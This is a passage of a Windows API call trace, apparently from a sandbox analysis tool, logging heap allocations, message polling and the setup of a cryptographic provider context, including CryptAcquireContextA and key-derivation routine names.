1 [0240.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0240.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0240.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0240.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0240.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0240.838] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0240.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0240.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0240.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0240.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0240.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0240.839] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0240.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0240.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0240.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0240.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0240.839] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0240.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0240.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0240.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0240.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0240.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0240.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0240.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0240.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0240.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0240.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0240.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0240.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0240.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0240.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0240.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0240.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0240.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0240.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0240.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0240.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0240.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0240.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0240.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0240.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0240.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0240.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0240.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0240.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0240.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0240.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0240.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0240.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0240.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0240.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0240.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0240.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0240.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0240.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0240.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0240.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0240.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0240.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0240.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0240.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0240.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0240.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0240.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0240.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0240.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0240.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0240.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0240.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0240.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0240.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0240.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0240.841] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0240.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0240.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0240.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0240.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0240.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0240.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0240.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0240.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0240.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0240.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0240.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0240.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0240.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0240.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0240.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0240.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0240.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0240.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0240.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0240.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0240.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0240.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0240.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0240.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0240.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0240.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0240.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0240.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0240.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0240.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0240.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0240.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0240.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0240.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0240.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0240.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0240.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0240.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0240.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0240.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0240.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0240.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0240.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0240.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0240.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0240.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0240.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0240.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0240.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0240.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0240.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0240.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0240.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0240.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0240.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0240.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0240.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0240.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0240.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0240.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0240.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0240.844] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0240.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0240.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0240.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0240.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04690 [0240.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0240.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0240.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0240.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69988 [0240.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69988, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0240.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0240.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0240.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0240.844] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0240.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0240.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0240.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04690 | out: hHeap=0x970000) returned 1 [0240.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0240.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0240.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0240.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0240.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0240.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0240.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0240.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0240.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0240.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0240.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0240.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0240.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0240.845] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0240.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0240.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0240.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0240.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0240.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0240.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0240.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0240.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0240.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0240.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0240.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0240.847] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.847] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.847] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0240.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0240.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0240.847] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0240.847] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0240.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0240.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0240.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0240.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0240.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0240.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0240.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0240.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0240.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0240.847] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0240.848] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0240.848] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.848] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0240.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040a8 | out: hHeap=0x970000) returned 1 [0240.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0240.848] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0240.848] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0240.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0240.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0240.848] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.894] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.895] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.895] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.895] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0240.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042d8 | out: hHeap=0x970000) returned 1 [0240.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0240.895] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.895] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.895] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.895] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.895] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.895] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.896] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0240.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0240.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0240.896] PeekMessageW (in: lpMsg=0x8cf158, 